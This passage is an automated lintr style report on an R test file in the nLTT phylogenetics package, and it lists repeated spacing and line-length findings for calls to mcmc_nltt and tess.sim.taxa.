*style:* **lines should not be more than 80 characters.**\n```r\n​    colMeans(mcmc_nltt(p,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_mcmc_nltt.R:24:26:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L24) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(p,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                         ^\n```\n[tests/testthat/test_mcmc_nltt.R:24:32:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L24) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(p,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                               ^\n```\n[tests/testthat/test_mcmc_nltt.R:24:36:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L24) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(p,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                   ^\n```\n[tests/testthat/test_mcmc_nltt.R:24:42:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L24) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(p,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                         ^\n```\n[tests/testthat/test_mcmc_nltt.R:24:49:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L24) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(p,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                ^\n```\n[tests/testthat/test_mcmc_nltt.R:24:55:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L24) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(p,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                      ^\n```\n[tests/testthat/test_mcmc_nltt.R:24:65:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​    colMeans(mcmc_nltt(p,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                               ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:24:72:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L24) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(p,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                                       ^\n```\n[tests/testthat/test_mcmc_nltt.R:24:78:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​    colMeans(mcmc_nltt(p,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                                            ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:24:84:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L24) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(p,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                                                   ^\n```\n[tests/testthat/test_mcmc_nltt.R:24:92:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​    colMeans(mcmc_nltt(p,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                                                          ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:24:95:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L24) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(p,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                                                              ^\n```\n[tests/testthat/test_mcmc_nltt.R:24:100:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​    colMeans(mcmc_nltt(p,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                                                                  ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:30:1:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L30) *style:* **lines should not be more than 80 characters.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_mcmc_nltt.R:30:26:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L30) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                         ^\n```\n[tests/testthat/test_mcmc_nltt.R:30:32:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L30) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                               ^\n```\n[tests/testthat/test_mcmc_nltt.R:30:36:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L30) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                   ^\n```\n[tests/testthat/test_mcmc_nltt.R:30:42:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L30) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                         ^\n```\n[tests/testthat/test_mcmc_nltt.R:30:49:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L30) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                ^\n```\n[tests/testthat/test_mcmc_nltt.R:30:55:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L30) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                      ^\n```\n[tests/testthat/test_mcmc_nltt.R:30:65:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L30) *style:* **Put spaces around all infix operators.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                               ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:30:72:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L30) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                                       ^\n```\n[tests/testthat/test_mcmc_nltt.R:30:78:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L30) *style:* **Put spaces around all infix operators.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                                            ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:30:84:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L30) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                                                   ^\n```\n[tests/testthat/test_mcmc_nltt.R:30:92:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L30) *style:* **Put spaces around all infix operators.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                                                          ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:30:95:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L30) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                                                              ^\n```\n[tests/testthat/test_mcmc_nltt.R:30:100:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L30) *style:* **Put spaces around all infix operators.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                                                                  ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:35:1:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L35) *style:* **lines should not be more than 80 characters.**\n```r\n​  expect_equal( #compare jumps in log space with jumps in normal space, should yield similar results\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_mcmc_nltt.R:36:1:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L36) *style:* **lines should not be more than 80 characters.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_mcmc_nltt.R:36:26:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L36) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                         ^\n```\n[tests/testthat/test_mcmc_nltt.R:36:32:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L36) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                               ^\n```\n[tests/testthat/test_mcmc_nltt.R:36:36:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L36) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                   ^\n```\n[tests/testthat/test_mcmc_nltt.R:36:42:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L36) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                         ^\n```\n[tests/testthat/test_mcmc_nltt.R:36:49:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L36) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                ^\n```\n[tests/testthat/test_mcmc_nltt.R:36:55:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L36) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                      ^\n```\n[tests/testthat/test_mcmc_nltt.R:36:65:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L36) *style:* **Put spaces around all infix operators.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                               ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:36:72:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L36) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                                       ^\n```\n[tests/testthat/test_mcmc_nltt.R:36:78:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L36) *style:* **Put spaces around all infix operators.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                                            ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:36:84:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L36) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                                                   ^\n```\n[tests/testthat/test_mcmc_nltt.R:36:92:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L36) *style:* **Put spaces around all infix operators.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                                                          ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:36:95:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L36) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                                                              ^\n```\n[tests/testthat/test_mcmc_nltt.R:36:100:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L36) *style:* **Put spaces around all infix operators.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                                                                  ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:37:1:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L37) *style:* **lines should not be more than 80 characters.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(FALSE,FALSE),iterations=10000,burnin=1000,thinning=1,sigma=0.01))[[1]],\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_mcmc_nltt.R:37:26:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L37) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(FALSE,FALSE),iterations=10000,burnin=1000,thinning=1,sigma=0.01))[[1]],\n                         ^\n```\n[tests/testthat/test_mcmc_nltt.R:37:32:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L37) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(FALSE,FALSE),iterations=10000,burnin=1000,thinning=1,sigma=0.01))[[1]],\n                               ^\n```\n[tests/testthat/test_mcmc_nltt.R:37:36:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L37) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(FALSE,FALSE),iterations=10000,burnin=1000,thinning=1,sigma=0.01))[[1]],\n                                   ^\n```\n[tests/testthat/test_mcmc_nltt.R:37:42:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L37) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(FALSE,FALSE),iterations=10000,burnin=1000,thinning=1,sigma=0.01))[[1]],\n                                         ^\n```\n[tests/testthat/test_mcmc_nltt.R:37:50:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L37) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(FALSE,FALSE),iterations=10000,burnin=1000,thinning=1,sigma=0.01))[[1]],\n                                                 ^\n```\n[tests/testthat/test_mcmc_nltt.R:37:57:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L37) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(FALSE,FALSE),iterations=10000,burnin=1000,thinning=1,sigma=0.01))[[1]],\n                                                        ^\n```\n[tests/testthat/test_mcmc_nltt.R:37:67:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L37) *style:* **Put spaces around all infix operators.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(FALSE,FALSE),iterations=10000,burnin=1000,thinning=1,sigma=0.01))[[1]],\n                                                                 ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:37:74:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L37) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(FALSE,FALSE),iterations=10000,burnin=1000,thinning=1,sigma=0.01))[[1]],\n                                                                         ^\n```\n[tests/testthat/test_mcmc_nltt.R:37:80:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L37) *style:* **Put spaces around all infix operators.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(FALSE,FALSE),iterations=10000,burnin=1000,thinning=1,sigma=0.01))[[1]],\n                                                                              ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:37:86:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L37) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(FALSE,FALSE),iterations=10000,burnin=1000,thinning=1,sigma=0.01))[[1]],\n                                                                                     ^\n```\n[tests/testthat/test_mcmc_nltt.R:37:94:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L37) *style:* **Put spaces around all infix operators.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(FALSE,FALSE),iterations=10000,burnin=1000,thinning=1,sigma=0.01))[[1]],\n                                                                                            ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:37:97:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L37) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(FALSE,FALSE),iterations=10000,burnin=1000,thinning=1,sigma=0.01))[[1]],\n                                                                                                ^\n```\n[tests/testthat/test_mcmc_nltt.R:37:102:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L37) *style:* **Put spaces around all infix operators.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(FALSE,FALSE),iterations=10000,burnin=1000,thinning=1,sigma=0.01))[[1]],\n                                                                                                    ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:45:29:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L45) *style:* **Put spaces around all infix operators.**\n```r\n​  p <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                           ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:45:32:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L45) *style:* **Commas should always have a space after.**\n```r\n​  p <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                               ^\n```\n[tests/testthat/test_mcmc_nltt.R:45:37:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L45) *style:* **Put spaces around all infix operators.**\n```r\n​  p <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                   ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:45:41:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L45) *style:* **Commas should always have a space after.**\n```r\n​  p <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                        ^\n```\n[tests/testthat/test_mcmc_nltt.R:45:44:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L45) *style:* **Put spaces around all infix operators.**\n```r\n​  p <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                          ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:45:49:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L45) *style:* **Commas should always have a space after.**\n```r\n​  p <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                                ^\n```\n[tests/testthat/test_mcmc_nltt.R:45:55:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L45) *style:* **Put spaces around all infix operators.**\n```r\n​  p <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                                     ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:45:60:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L45) *style:* **Commas should always have a space after.**\n```r\n​  p <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                                           ^\n```\n[tests/testthat/test_mcmc_nltt.R:45:62:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L45) *style:* **Put spaces around all infix operators.**\n```r\n​  p <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                                            ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:46:29:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​  q <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                           ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:46:32:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L46) *style:* **Commas should always have a space after.**\n```r\n​  q <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                               ^\n```\n[tests/testthat/test_mcmc_nltt.R:46:37:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​  q <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                   ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:46:41:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L46) *style:* **Commas should always have a space after.**\n```r\n​  q <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                        ^\n```\n[tests/testthat/test_mcmc_nltt.R:46:44:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L46) 